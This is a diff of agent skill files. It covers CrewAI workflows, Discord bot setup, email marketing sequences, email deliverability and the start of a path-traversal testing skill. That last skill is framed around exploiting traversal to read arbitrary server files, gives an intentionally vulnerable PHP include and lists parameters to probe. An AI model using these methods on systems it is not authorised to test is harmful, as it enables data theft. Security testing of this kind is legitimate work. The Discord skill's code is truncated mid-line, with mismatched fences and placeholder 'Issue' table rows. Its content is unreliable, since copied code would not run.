tasks=[research_task, analysis_task, writing_task],
process=Process.hierarchical,
manager_llm=ChatOpenAI(model="gpt-4o"), # Manager model
verbose=True
)
# Manager decides:
# - Which agent handles which task
# - When to delegate
# - How to combine results
result = crew.kickoff()
```
### Planning Feature
Generate execution plan before running
**When to use**: Complex workflows needing structure
```python
from crewai import Crew, Process
# Enable planning
crew = Crew(
agents=[researcher, writer, reviewer],
tasks=[research, write, review],
process=Process.sequential,
planning=True, # Enable planning
planning_llm=ChatOpenAI(model="gpt-4o") # Planner model
)
# With planning enabled:
# 1. CrewAI generates step-by-step plan
# 2. Plan is injected into each task
# 3. Agents see overall structure
# 4. More consistent results
result = crew.kickoff()
# Access the plan
print(crew.plan)
```
## Anti-Patterns
### ❌ Vague Agent Roles
**Why bad**: Agent doesn't know its specialty.
Overlapping responsibilities.
Poor task delegation.
**Instead**: Be specific:
- "Senior React Developer" not "Developer"
- "Financial Analyst specializing in crypto" not "Analyst"
Include specific skills in backstory.
### ❌ Missing Expected Outputs
**Why bad**: Agent doesn't know done criteria.
Inconsistent outputs.
Hard to chain tasks.
**Instead**: Always specify expected_output:
expected_output: |
A JSON object with:
- summary: string (100 words max)
- key_points: list of strings
- confidence: float 0-1
### ❌ Too Many Agents
**Why bad**: Coordination overhead.
Inconsistent communication.
Slower execution.
**Instead**: 3-5 agents with clear roles.
One agent can handle multiple related tasks.
Use tools instead of agents for simple actions.
## Limitations
- Python-only
- Best for structured workflows
- Can be verbose for simple cases
- Flows are newer feature
## Related Skills
Works well with: `langgraph`, `autonomous-agents`, `langfuse`, `structured-output`

277
skills/discord-bot-architect/SKILL.md Normal file
View File

@@ -0,0 +1,277 @@
---
name: discord-bot-architect
description: "Specialized skill for building production-ready Discord bots. Covers Discord.js (JavaScript) and Pycord (Python), gateway intents, slash commands, interactive components, rate limiting, and sharding."
source: vibeship-spawner-skills (Apache 2.0)
---
# Discord Bot Architect
## Patterns
### Discord.js v14 Foundation
Modern Discord bot setup with Discord.js v14 and slash commands
**When to use**: ['Building Discord bots with JavaScript/TypeScript', 'Need full gateway connection with events', 'Building bots with complex interactions']
```javascript
```javascript
// src/index.js
const { Client, Collection, GatewayIntentBits, Events } = require('discord.js');
const fs = require('node:fs');
const path = require('node:path');
require('dotenv').config();
// Create client with minimal required intents
const client = new Client({
intents: [
GatewayIntentBits.Guilds,
// Add only what you need:
// GatewayIntentBits.GuildMessages,
// GatewayIntentBits.MessageContent, // PRIVILEGED - avoid if possible
]
});
// Load commands
client.commands = new Collection();
const commandsPath = path.join(__dirname, 'commands');
const commandFiles = fs.readdirSync(commandsPath).filter(f => f.endsWith('.js'));
for (const file of commandFiles) {
const filePath = path.join(commandsPath, file);
const command = require(filePath);
if ('data' in command && 'execute' in command) {
client.commands.set(command.data.name, command);
}
}
// Load events
const eventsPath = path.join(__dirname, 'events');
const eventFiles = fs.readdirSync(eventsPath).filter(f => f.endsWith('.js'));
for (const file of eventFiles) {
const filePath = path.join(eventsPath, file);
const event = require(filePath);
if (event.once) {
client.once(event.name, (...args) => event.execute(...args));
} else {
client.on(event.name, (...args) => event.execute(...args));
}
}
client.login(process.env.DISCORD_TOKEN);
```
```javascript
// src/commands/ping.js
const { SlashCommandBuilder } = require('discord.js');
module.exports = {
data: new SlashCommandBuilder()
.setName('ping')
.setDescription('Replies with Pong!'),
async execute(interaction) {
const sent = await interaction.reply({
content: 'Pinging...',
fetchReply: true
});
const latency = sent.createdTimestamp - interaction.createdTimestamp;
await interaction.editReply(`Pong! Latency: ${latency}ms`);
}
};
```
```javascript
// src/events/interactionCreate.js
const { Events } = require('discord.js');
module.exports = {
name: Event
```
### Pycord Bot Foundation
Discord bot with Pycord (Python) and application commands
**When to use**: ['Building Discord bots with Python', 'Prefer async/await patterns', 'Need good slash command support']
```python
```python
# main.py
import os
import discord
from discord.ext import commands
from dotenv import load_dotenv
load_dotenv()
# Configure intents - only enable what you need
intents = discord.Intents.default()
# intents.message_content = True # PRIVILEGED - avoid if possible
# intents.members = True # PRIVILEGED
bot = commands.Bot(
command_prefix="!", # Legacy, prefer slash commands
intents=intents
)
@bot.event
async def on_ready():
print(f"Logged in as {bot.user}")
# Sync commands (do this carefully - see sharp edges)
# await bot.sync_commands()
# Slash command
@bot.slash_command(name="ping", description="Check bot latency")
async def ping(ctx: discord.ApplicationContext):
latency = round(bot.latency * 1000)
await ctx.respond(f"Pong! Latency: {latency}ms")
# Slash command with options
@bot.slash_command(name="greet", description="Greet a user")
async def greet(
ctx: discord.ApplicationContext,
user: discord.Option(discord.Member, "User to greet"),
message: discord.Option(str, "Custom message", required=False)
):
msg = message or "Hello!"
await ctx.respond(f"{user.mention}, {msg}")
# Load cogs
for filename in os.listdir("./cogs"):
if filename.endswith(".py"):
bot.load_extension(f"cogs.{filename[:-3]}")
bot.run(os.environ["DISCORD_TOKEN"])
```
```python
# cogs/general.py
import discord
from discord.ext import commands
class General(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.slash_command(name="info", description="Bot information")
async def info(self, ctx: discord.ApplicationContext):
embed = discord.Embed(
title="Bot Info",
description="A helpful Discord bot",
color=discord.Color.blue()
)
embed.add_field(name="Servers", value=len(self.bot.guilds))
embed.add_field(name="Latency", value=f"{round(self.bot.latency * 1000)}ms")
await ctx.respond(embed=embed)
@commands.Cog.
```
### Interactive Components Pattern
Using buttons, select menus, and modals for rich UX
**When to use**: ['Need interactive user interfaces', 'Collecting user input beyond slash command options', 'Building menus, confirmations, or forms']
```python
```javascript
// Discord.js - Buttons and Select Menus
const {
SlashCommandBuilder,
ActionRowBuilder,
ButtonBuilder,
ButtonStyle,
StringSelectMenuBuilder,
ModalBuilder,
TextInputBuilder,
TextInputStyle
} = require('discord.js');
module.exports = {
data: new SlashCommandBuilder()
.setName('menu')
.setDescription('Shows an interactive menu'),
async execute(interaction) {
// Button row
const buttonRow = new ActionRowBuilder()
.addComponents(
new ButtonBuilder()
.setCustomId('confirm')
.setLabel('Confirm')
.setStyle(ButtonStyle.Primary),
new ButtonBuilder()
.setCustomId('cancel')
.setLabel('Cancel')
.setStyle(ButtonStyle.Danger),
new ButtonBuilder()
.setLabel('Documentation')
.setURL('https://discord.js.org')
.setStyle(ButtonStyle.Link) // Link buttons don't emit events
);
// Select menu row (one per row, takes all 5 slots)
const selectRow = new ActionRowBuilder()
.addComponents(
new StringSelectMenuBuilder()
.setCustomId('select-role')
.setPlaceholder('Select a role')
.setMinValues(1)
.setMaxValues(3)
.addOptions([
{ label: 'Developer', value: 'dev', emoji: '💻' },
{ label: 'Designer', value: 'design', emoji: '🎨' },
{ label: 'Community', value: 'community', emoji: '🎉' }
])
);
await interaction.reply({
content: 'Choose an option:',
components: [buttonRow, selectRow]
});
// Collect responses
const collector = interaction.channel.createMessageComponentCollector({
filter: i => i.user.id === interaction.user.id,
time: 60_000 // 60 seconds timeout
});
collector.on('collect', async i => {
if (i.customId === 'confirm') {
await i.update({ content: 'Confirmed!', components: [] });
collector.stop();
} else if (i.custo
```
## Anti-Patterns
### ❌ Message Content for Commands
**Why bad**: Message Content Intent is privileged and deprecated for bot commands.
Slash commands are the intended approach.
### ❌ Syncing Commands on Every Start
**Why bad**: Command registration is rate limited. Global commands take up to 1 hour
to propagate. Syncing on every start wastes API calls and can hit limits.
### ❌ Blocking the Event Loop
**Why bad**: Discord gateway requires regular heartbeats. Blocking operations
cause missed heartbeats and disconnections.
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | ## Acknowledge immediately, process later |
| Issue | critical | ## Step 1: Enable in Developer Portal |
| Issue | high | ## Use a separate deploy script (not on startup) |
| Issue | critical | ## Never hardcode tokens |
| Issue | high | ## Generate correct invite URL |
| Issue | medium | ## Development: Use guild commands |
| Issue | medium | ## Never block the event loop |
| Issue | medium | ## Show modal immediately |

925
skills/email-sequence/SKILL.md Normal file
View File

@@ -0,0 +1,925 @@
---
name: email-sequence
description: When the user wants to create or optimize an email sequence, drip campaign, automated email flow, or lifecycle email program. Also use when the user mentions "email sequence," "drip campaign," "nurture sequence," "onboarding emails," "welcome sequence," "re-engagement emails," "email automation," or "lifecycle emails." For in-app onboarding, see onboarding-cro.
---
# Email Sequence Design
You are an expert in email marketing and automation. Your goal is to create email sequences that nurture relationships, drive action, and move people toward conversion.
## Initial Assessment
Before creating a sequence, understand:
1. **Sequence Type**
- Welcome/onboarding sequence
- Lead nurture sequence
- Re-engagement sequence
- Post-purchase sequence
- Event-based sequence
- Educational sequence
- Sales sequence
2. **Audience Context**
- Who are they?
- What triggered them into this sequence?
- What do they already know/believe?
- What's their current relationship with you?
3. **Goals**
- Primary conversion goal
- Relationship-building goals
- Segmentation goals
- What defines success?
---
## Core Principles
### 1. One Email, One Job
- Each email has one primary purpose
- One main CTA per email
- Don't try to do everything
### 2. Value Before Ask
- Lead with usefulness
- Build trust through content
- Earn the right to sell
### 3. Relevance Over Volume
- Fewer, better emails win
- Segment for relevance
- Quality > frequency
### 4. Clear Path Forward
- Every email moves them somewhere
- Links should do something useful
- Make next steps obvious
---
## Email Sequence Strategy
### Sequence Length
- Welcome: 3-7 emails
- Lead nurture: 5-10 emails
- Onboarding: 5-10 emails
- Re-engagement: 3-5 emails
Depends on:
- Sales cycle length
- Product complexity
- Relationship stage
### Timing/Delays
- Welcome email: Immediately
- Early sequence: 1-2 days apart
- Nurture: 2-4 days apart
- Long-term: Weekly or bi-weekly
Consider:
- B2B: Avoid weekends
- B2C: Test weekends
- Time zones: Send at local time
### Subject Line Strategy
- Clear > Clever
- Specific > Vague
- Benefit or curiosity-driven
- 40-60 characters ideal
- Test emoji (they're polarizing)
**Patterns that work:**
- Question: "Still struggling with X?"
- How-to: "How to [achieve outcome] in [timeframe]"
- Number: "3 ways to [benefit]"
- Direct: "[First name], your [thing] is ready"
- Story tease: "The mistake I made with [topic]"
### Preview Text
- Extends the subject line
- ~90-140 characters
- Don't repeat subject line
- Complete the thought or add intrigue
---
## Sequence Templates
### Welcome Sequence (Post-Signup)
**Email 1: Welcome (Immediate)**
- Subject: Welcome to [Product] — here's your first step
- Deliver what was promised (lead magnet, access, etc.)
- Single next action
- Set expectations for future emails
**Email 2: Quick Win (Day 1-2)**
- Subject: Get your first [result] in 10 minutes
- Enable small success
- Build confidence
- Link to helpful resource
**Email 3: Story/Why (Day 3-4)**
- Subject: Why we built [Product]
- Origin story or mission
- Connect emotionally
- Show you understand their problem
**Email 4: Social Proof (Day 5-6)**
- Subject: How [Customer] achieved [Result]
- Case study or testimonial
- Relatable to their situation
- Soft CTA to explore
**Email 5: Overcome Objection (Day 7-8)**
- Subject: "I don't have time for X" — sound familiar?
- Address common hesitation
- Reframe the obstacle
- Show easy path forward
**Email 6: Core Feature (Day 9-11)**
- Subject: Have you tried [Feature] yet?
- Highlight underused capability
- Show clear benefit
- Direct CTA to try it
**Email 7: Conversion (Day 12-14)**
- Subject: Ready to [upgrade/buy/commit]?
- Summarize value
- Clear offer
- Urgency if appropriate
- Risk reversal (guarantee, trial)
---
### Lead Nurture Sequence (Pre-Sale)
**Email 1: Deliver + Introduce (Immediate)**
- Deliver the lead magnet
- Brief intro to who you are
- Preview what's coming
**Email 2: Expand on Topic (Day 2-3)**
- Related insight to lead magnet
- Establish expertise
- Light CTA to content
**Email 3: Problem Deep-Dive (Day 4-5)**
- Articulate their problem deeply
- Show you understand
- Hint at solution
**Email 4: Solution Framework (Day 6-8)**
- Your approach/methodology
- Educational, not salesy
- Builds toward your product
**Email 5: Case Study (Day 9-11)**
- Real results from real customer
- Specific and relatable
- Soft CTA
**Email 6: Differentiation (Day 12-14)**
- Why your approach is different
- Address alternatives
- Build preference
**Email 7: Objection Handler (Day 15-18)**
- Common concern addressed
- FAQ or myth-busting
- Reduce friction
**Email 8: Direct Offer (Day 19-21)**
- Clear pitch
- Strong value proposition
- Specific CTA
- Urgency if available
---
### Re-Engagement Sequence
**Email 1: Check-In (Day 30-60 of inactivity)**
- Subject: Is everything okay, [Name]?
- Genuine concern
- Ask what happened
- Easy win to re-engage
**Email 2: Value Reminder (Day 2-3 after)**
- Subject: Remember when you [achieved X]?
- Remind of past value
- What's new since they left
- Quick CTA
**Email 3: Incentive (Day 5-7 after)**
- Subject: We miss you — here's something special
- Offer if appropriate
- Limited time
- Clear CTA
**Email 4: Last Chance (Day 10-14 after)**
- Subject: Should we stop emailing you?
- Honest and direct
- One-click to stay or go
- Clean the list if no response
---
### Onboarding Sequence (Product Users)
Coordinate with in-app onboarding. Email supports, doesn't duplicate.
**Email 1: Welcome + First Step (Immediate)**
- Confirm signup
- One critical action
- Link directly to that action
**Email 2: Getting Started Help (Day 1)**
- If they haven't completed step 1
- Quick tip or video
- Support option
**Email 3: Feature Highlight (Day 2-3)**
- Key feature they should know
- Specific use case
- In-app link
**Email 4: Success Story (Day 4-5)**
- Customer who succeeded
- Relatable journey
- Motivational
**Email 5: Check-In (Day 7)**
- How's it going?
- Ask for feedback
- Offer help
**Email 6: Advanced Tip (Day 10-12)**
- Power feature
- For engaged users
- Level-up content
**Email 7: Upgrade/Expand (Day 14+)**
- For trial users: conversion push
- For free users: upgrade prompt
- For paid: expansion opportunity
---
## Email Types Reference
A comprehensive guide to lifecycle and campaign emails. Use this as an audit checklist and implementation reference.
### Onboarding Emails
#### New Users Series
**Trigger**: User signs up (free or trial)
**Goal**: Activate user, drive to aha moment
**Typical sequence**: 5-7 emails over 14 days
- Email 1: Welcome + single next step (immediate)
- Email 2: Quick win / getting started (day 1)
- Email 3: Key feature highlight (day 3)
- Email 4: Success story / social proof (day 5)
- Email 5: Check-in + offer help (day 7)
- Email 6: Advanced tip (day 10)
- Email 7: Upgrade prompt or next milestone (day 14)
**Key metrics**: Activation rate, feature adoption
---
#### New Customers Series
**Trigger**: User converts to paid
**Goal**: Reinforce purchase decision, drive adoption, reduce early churn
**Typical sequence**: 3-5 emails over 14 days
- Email 1: Thank you + what's next (immediate)
- Email 2: Getting full value — setup checklist (day 2)
- Email 3: Pro tips for paid features (day 5)
- Email 4: Success story from similar customer (day 7)
- Email 5: Check-in + introduce support resources (day 14)
**Key point**: Different from new user series—they've committed. Focus on reinforcement and expansion, not conversion.
---
#### Key Onboarding Step Reminder
**Trigger**: User hasn't completed critical setup step after X time
**Goal**: Nudge completion of high-value action
**Format**: Single email or 2-3 email mini-sequence
**Example triggers**:
- Hasn't connected integration after 48 hours
- Hasn't invited team member after 3 days
- Hasn't completed profile after 24 hours
**Copy approach**:
- Remind them what they started
- Explain why this step matters
- Make it easy (direct link to complete)
- Offer help if stuck
---
#### New User Invite
**Trigger**: Existing user invites teammate
**Goal**: Activate the invited user
**Recipient**: The person being invited
- Email 1: You've been invited (immediate)
- Email 2: Reminder if not accepted (day 2)
- Email 3: Final reminder (day 5)
**Copy approach**:
- Personalize with inviter's name
- Explain what they're joining
- Single CTA to accept invite
- Social proof optional
---
### Retention Emails
#### Upgrade to Paid
**Trigger**: Free user shows engagement, or trial ending
**Goal**: Convert free to paid
**Typical sequence**: 3-5 emails
**Trigger options**:
- Time-based (trial day 10, 12, 14)
- Behavior-based (hit usage limit, used premium feature)
- Engagement-based (highly active free user)
**Sequence structure**:
- Value summary: What they've accomplished
- Feature comparison: What they're missing
- Social proof: Who else upgraded
- Urgency: Trial ending, limited offer
- Final: Last chance + easy path
---
#### Upgrade to Higher Plan
**Trigger**: User approaching plan limits or using features available on higher tier
**Goal**: Upsell to next tier
**Format**: Single email or 2-3 email sequence
**Trigger examples**:
- 80% of seat limit reached
- 90% of storage/usage limit
- Tried to use higher-tier feature
- Power user behavior patterns
**Copy approach**:
- Acknowledge their growth (positive framing)
- Show what next tier unlocks
- Quantify value vs. cost
- Easy upgrade path
---
#### Ask for Review
**Trigger**: Customer milestone (30/60/90 days, key achievement, support resolution)
**Goal**: Generate social proof on G2, Capterra, app stores
**Format**: Single email
**Best timing**:
- After positive support interaction
- After achieving measurable result
- After renewal
- NOT after billing issues or bugs
**Copy approach**:
- Thank them for being a customer
- Mention specific value/milestone if possible
- Explain why reviews matter (help others decide)
- Direct link to review platform
- Keep it short—this is an ask
---
#### Offer Support Proactively
**Trigger**: Signs of struggle (drop in usage, failed actions, error encounters)
**Goal**: Save at-risk user, improve experience
**Format**: Single email
**Trigger examples**:
- Usage dropped significantly week-over-week
- Multiple failed attempts at action
- Viewed help docs repeatedly
- Stuck at same onboarding step
**Copy approach**:
- Genuine concern tone
- Specific: "I noticed you..." (if data allows)
- Offer direct help (not just link to docs)
- Personal from support or CSM
- No sales pitch—pure help
---
#### Product Usage Report
**Trigger**: Time-based (weekly, monthly, quarterly)
**Goal**: Demonstrate value, drive engagement, reduce churn
**Format**: Single email, recurring
**What to include**:
- Key metrics/activity summary
- Comparison to previous period
- Achievements/milestones
- Suggestions for improvement
- Light CTA to explore more
**Examples**:
- "You saved X hours this month"
- "Your team completed X projects"
- "You're in the top X% of users"
**Key point**: Make them feel good and remind them of value delivered.
---
#### NPS Survey
**Trigger**: Time-based (quarterly) or event-based (post-milestone)
**Goal**: Measure satisfaction, identify promoters and detractors
**Format**: Single email
**Best practices**:
- Keep it simple: Just the NPS question initially
- Follow-up form for "why" based on score
- Personal sender (CEO, founder, CSM)
- Tell them how you'll use feedback
**Follow-up based on score**:
- Promoters (9-10): Thank + ask for review/referral
- Passives (7-8): Ask what would make it a 10
- Detractors (0-6): Personal outreach to understand issues
---
#### Referral Program
**Trigger**: Customer milestone, promoter NPS score, or campaign
**Goal**: Generate referrals
**Format**: Single email or periodic reminders
**Good timing**:
- After positive NPS response
- After customer achieves result
- After renewal
- Seasonal campaigns
**Copy approach**:
- Remind them of their success
- Explain the referral offer clearly
- Make sharing easy (unique link)
- Show what's in it for them AND referee
---
### Billing Emails
#### Switch to Annual
**Trigger**: Monthly subscriber at renewal time or campaign
**Goal**: Convert monthly to annual (improve LTV, reduce churn)
**Format**: Single email or 2-email sequence
**Value proposition**:
- Calculate exact savings
- Additional benefits (if any)
- Lock in current price messaging
- Easy one-click switch
**Best timing**:
- Around monthly renewal date
- End of year / new year
- After 3-6 months of loyalty
- Price increase announcement (lock in old rate)
---
#### Failed Payment Recovery
**Trigger**: Payment fails
**Goal**: Recover revenue, retain customer
**Typical sequence**: 3-4 emails over 7-14 days
**Sequence structure**:
- Email 1 (Day 0): Friendly notice, update payment link
- Email 2 (Day 3): Reminder, service may be interrupted
- Email 3 (Day 7): Urgent, account will be suspended
- Email 4 (Day 10-14): Final notice, what they'll lose
**Copy approach**:
- Assume it's an accident (card expired, etc.)
- Clear, direct, no guilt
- Single CTA to update payment
- Explain what happens if not resolved
**Key metrics**: Recovery rate, time to recovery
---
#### Cancellation Survey
**Trigger**: User cancels subscription
**Goal**: Learn why, opportunity to save
**Format**: Single email (immediate)
**Options**:
- In-app survey at cancellation (better completion)
- Follow-up email if they skip in-app
- Personal outreach for high-value accounts
**Questions to ask**:
- Primary reason for cancelling
- What could we have done better
- Would anything change your mind
- Can we help with transition
**Winback opportunity**: Based on reason, offer targeted save (discount, pause, downgrade, training).
---
#### Upcoming Renewal Reminder
**Trigger**: X days before renewal (14 or 30 days typical)
**Goal**: No surprise charges, opportunity to expand
**Format**: Single email
**What to include**:
- Renewal date and amount
- What's included in renewal
- How to update payment/plan
- Changes to pricing/features (if any)
- Optional: Upsell opportunity
**Required for**: Annual subscriptions, high-value contracts
---
### Usage Emails
#### Daily/Weekly/Monthly Summary
**Trigger**: Time-based
**Goal**: Drive engagement, demonstrate value
**Format**: Single email, recurring
**Content by frequency**:
- **Daily**: Notifications, quick stats (for high-engagement products)
- **Weekly**: Activity summary, highlights, suggestions
- **Monthly**: Comprehensive report, achievements, ROI if calculable
**Structure**:
- Key metrics at a glance
- Notable achievements
- Activity breakdown
- Suggestions / what to try next
- CTA to dive deeper
**Personalization**: Must be relevant to their actual usage. Empty reports are worse than no report.
---
#### Key Event or Milestone Notifications
**Trigger**: Specific achievement or event
**Goal**: Celebrate, drive continued engagement
**Format**: Single email per event
**Milestone examples**:
- First [action] completed
- 10th/100th [thing] created
- Goal achieved
- Team collaboration milestone
- Usage streak
**Copy approach**:
- Celebration tone
- Specific achievement
- Context (compared to others, compared to before)
- What's next / next milestone
---
### Win-Back Emails
#### Expired Trials
**Trigger**: Trial ended without conversion
**Goal**: Convert or re-engage
**Typical sequence**: 3-4 emails over 30 days
**Sequence structure**:
- Email 1 (Day 1 post-expiry): Trial ended, here's what you're missing
- Email 2 (Day 7): What held you back? (gather feedback)
- Email 3 (Day 14): Incentive offer (discount, extended trial)
- Email 4 (Day 30): Final reach-out, door is open
**Segmentation**: Different approach based on trial engagement level:
- High engagement: Focus on removing friction to convert
- Low engagement: Offer fresh start, more onboarding help
- No engagement: Ask what happened, offer demo/call
---
#### Cancelled Customers
**Trigger**: Time after cancellation (30, 60, 90 days)
**Goal**: Win back churned customers
**Typical sequence**: 2-3 emails spread over 90 days
**Sequence structure**:
- Email 1 (Day 30): What's new since you left
- Email 2 (Day 60): We've addressed [common reason]
- Email 3 (Day 90): Special offer to return
**Copy approach**:
- No guilt, no desperation
- Genuine updates and improvements
- Personalize based on cancellation reason if known
- Make return easy
**Key point**: They're more likely to return if their reason was addressed.
---
### Campaign Emails
#### Monthly Roundup / Newsletter
**Trigger**: Time-based (monthly)
**Goal**: Engagement, brand presence, content distribution
**Format**: Single email, recurring
**Content mix**:
- Product updates and tips
- Customer stories
- Educational content
- Company news
- Industry insights
**Best practices**:
- Consistent send day/time
- Scannable format
- Mix of content types
- One primary CTA focus
- Unsubscribe is okay—keeps list healthy
---
#### Seasonal Promotions
**Trigger**: Calendar events (Black Friday, New Year, etc.)
**Goal**: Drive conversions with timely offer
**Format**: Campaign burst (2-4 emails)
**Common opportunities**:
- New Year (fresh start, annual planning)
- End of fiscal year (budget spending)
- Black Friday / Cyber Monday
- Industry-specific seasons
- Back to school / work
**Sequence structure**:
- Announcement: Offer reveal
- Reminder: Midway through promotion
- Last chance: Final hours
---
#### Product Updates
**Trigger**: New feature release
**Goal**: Adoption, engagement, demonstrate momentum
**Format**: Single email per major release
**What to include**:
- What's new (clear and simple)
- Why it matters (benefit, not just feature)
- How to use it (direct link)
- Who asked for it (community acknowledgment)
**Segmentation**: Consider targeting based on relevance:
- Users who would benefit most
- Users who requested feature
- Power users first (for beta feel)
---
#### Industry News Roundup
**Trigger**: Time-based (weekly or monthly)
**Goal**: Thought leadership, engagement, brand value
**Format**: Curated newsletter
**Content**:
- Curated news and links
- Your take / commentary
- What it means for readers
- How your product helps
**Best for**: B2B products where customers care about industry trends.
---
#### Pricing Update
**Trigger**: Price change announcement
**Goal**: Transparent communication, minimize churn
**Format**: Single email (or sequence for major changes)
**Timeline**:
- Announce 30-60 days before change
- Reminder 14 days before
- Final notice 7 days before
**Copy approach**:
- Clear, direct, transparent
- Explain the why (value delivered, costs increased)
- Grandfather if possible (lock in old rate)
- Give options (annual lock-in, downgrade)
**Important**: Honesty and advance notice build trust even when price increases.
---
## Email Audit Checklist
Use this to audit your current email program:
### Onboarding
- [ ] New users series
- [ ] New customers series
- [ ] Key onboarding step reminders
- [ ] New user invite sequence
### Retention
- [ ] Upgrade to paid sequence
- [ ] Upgrade to higher plan triggers
- [ ] Ask for review (timed properly)
- [ ] Proactive support outreach
- [ ] Product usage reports
- [ ] NPS survey
- [ ] Referral program emails
### Billing
- [ ] Switch to annual campaign
- [ ] Failed payment recovery sequence
- [ ] Cancellation survey
- [ ] Upcoming renewal reminders
### Usage
- [ ] Daily/weekly/monthly summaries
- [ ] Key event notifications
- [ ] Milestone celebrations
### Win-Back
- [ ] Expired trial sequence
- [ ] Cancelled customer sequence
### Campaigns
- [ ] Monthly roundup / newsletter
- [ ] Seasonal promotion calendar
- [ ] Product update announcements
- [ ] Pricing update communications
---
## Email Copy Guidelines
### Structure
1. **Hook**: First line grabs attention
2. **Context**: Why this matters to them
3. **Value**: The useful content
4. **CTA**: What to do next
5. **Sign-off**: Human, warm close
### Formatting
- Short paragraphs (1-3 sentences)
- White space between sections
- Bullet points for scanability
- Bold for emphasis (sparingly)
- Mobile-first (most read on phone)
### Tone
- Conversational, not formal
- First-person (I/we) and second-person (you)
- Active voice
- Match your brand but lean friendly
- Read it out loud—does it sound human?
### Length
- Shorter is usually better
- 50-125 words for transactional
- 150-300 words for educational
- 300-500 words for story-driven
- If it's long, it better be good
### CTA Buttons vs. Links
- Buttons: Primary actions, high-visibility
- Links: Secondary actions, in-text
- One clear primary CTA per email
- Button text: Action + outcome
---
## Personalization
### Merge Fields
- First name (fallback to "there" or "friend")
- Company name (B2B)
- Relevant data (usage, plan, etc.)
### Dynamic Content
- Based on segment
- Based on behavior
- Based on stage
### Triggered Emails
- Action-based sends
- More relevant than time-based
- Examples: Feature used, milestone hit, inactivity
---
## Segmentation Strategies
### By Behavior
- Openers vs. non-openers
- Clickers vs. non-clickers
- Active vs. inactive
### By Stage
- Trial vs. paid
- New vs. long-term
- Engaged vs. at-risk
### By Profile
- Industry/role (B2B)
- Use case / goal
- Company size
---
## Testing and Optimization
### What to Test
- Subject lines (highest impact)
- Send times
- Email length
- CTA placement and copy
- Personalization level
- Sequence timing
### How to Test
- A/B test one variable at a time
- Sufficient sample size
- Statistical significance
- Document learnings
### Metrics to Track
- Open rate (benchmark: 20-40%)
- Click rate (benchmark: 2-5%)
- Unsubscribe rate (keep under 0.5%)
- Conversion rate (specific to sequence goal)
- Revenue per email (if applicable)
---
## Output Format
### Sequence Overview
```
Sequence Name: [Name]
Trigger: [What starts the sequence]
Goal: [Primary conversion goal]
Length: [Number of emails]
Timing: [Delay between emails]
Exit Conditions: [When they leave the sequence]
```
### For Each Email
```
Email [#]: [Name/Purpose]
Send: [Timing]
Subject: [Subject line]
Preview: [Preview text]
Body: [Full copy]
CTA: [Button text] → [Link destination]
Segment/Conditions: [If applicable]
```
### Metrics Plan
What to measure and benchmarks
---
## Questions to Ask
If you need more context:
1. What triggers entry to this sequence?
2. What's the primary goal/conversion action?
3. Who is the audience?
4. What do they already know about you?
5. What other emails are they receiving?
6. What's your current email performance?
---
## Related Skills
- **onboarding-cro**: For in-app onboarding (email supports this)
- **copywriting**: For landing pages emails link to
- **ab-test-setup**: For testing email elements
- **popup-cro**: For email capture popups

54
skills/email-systems/SKILL.md Normal file
View File

@@ -0,0 +1,54 @@
---
name: email-systems
description: "Email has the highest ROI of any marketing channel. $36 for every $1 spent. Yet most startups treat it as an afterthought - bulk blasts, no personalization, landing in spam folders. This skill covers transactional email that works, marketing automation that converts, deliverability that reaches inboxes, and the infrastructure decisions that scale. Use when: keywords, file_patterns, code_patterns."
source: vibeship-spawner-skills (Apache 2.0)
---
# Email Systems
You are an email systems engineer who has maintained 99.9% deliverability
across millions of emails. You've debugged SPF/DKIM/DMARC, dealt with
blacklists, and optimized for inbox placement. You know that email is the
highest ROI channel when done right, and a spam folder nightmare when done
wrong. You treat deliverability as infrastructure, not an afterthought.
## Patterns
### Transactional Email Queue
Queue all transactional emails with retry logic and monitoring
### Email Event Tracking
Track delivery, opens, clicks, bounces, and complaints
### Template Versioning
Version email templates for rollback and A/B testing
## Anti-Patterns
### ❌ HTML email soup
**Why bad**: Email clients render differently. Outlook breaks everything.
### ❌ No plain text fallback
**Why bad**: Some clients strip HTML. Accessibility issues. Spam signal.
### ❌ Huge image emails
**Why bad**: Images blocked by default. Spam trigger. Slow loading.
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Missing SPF, DKIM, or DMARC records | critical | # Required DNS records: |
| Using shared IP for transactional email | high | # Transactional email strategy: |
| Not processing bounce notifications | high | # Bounce handling requirements: |
| Missing or hidden unsubscribe link | critical | # Unsubscribe requirements: |
| Sending HTML without plain text alternative | medium | # Always send multipart: |
| Sending high volume from new IP immediately | high | # IP warm-up schedule: |
| Emailing people who did not opt in | critical | # Permission requirements: |
| Emails that are mostly or entirely images | medium | # Balance images and text: |

483
skills/file-path-traversal/SKILL.md Normal file
View File

@@ -0,0 +1,483 @@
---
name: File Path Traversal Testing
description: This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". It provides comprehensive file path traversal attack and testing methodologies.
---
# File Path Traversal Testing
## Purpose
Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code. This vulnerability occurs when user-controllable input is passed to filesystem APIs without proper validation.
## Prerequisites
### Required Tools
- Web browser with developer tools
- Burp Suite or OWASP ZAP
- cURL for testing payloads
- Wordlists for automation
- ffuf or wfuzz for fuzzing
### Required Knowledge
- HTTP request/response structure
- Linux and Windows filesystem layout
- Web application architecture
- Basic understanding of file APIs
## Outputs and Deliverables
1. **Vulnerability Report** - Identified traversal points and severity
2. **Exploitation Proof** - Extracted file contents
3. **Impact Assessment** - Accessible files and data exposure
4. **Remediation Guidance** - Secure coding recommendations
## Core Workflow
### Phase 1: Understanding Path Traversal
Path traversal occurs when applications use user input to construct file paths:
```php
// Vulnerable PHP code example
$template = "blue.php";
if (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {
$template = $_COOKIE['template'];
}
include("/home/user/templates/" . $template);
```
Attack principle:
- `../` sequence moves up one directory
- Chain multiple sequences to reach root
- Access files outside intended directory
Impact:
- **Confidentiality** - Read sensitive files
- **Integrity** - Write/modify files (in some cases)
- **Availability** - Delete files (in some cases)
- **Code Execution** - If combined with file upload or log poisoning
### Phase 2: Identifying Traversal Points
Map application for potential file operations:
```bash
# Parameters that often handle files
?file=
?path=
?page=
?template=
?filename=
?doc=
?document=
?folder=
?dir=
?include=
?src=
?source=
?content=
?view=
?download=
?load=
?read=
?retrieve=
```
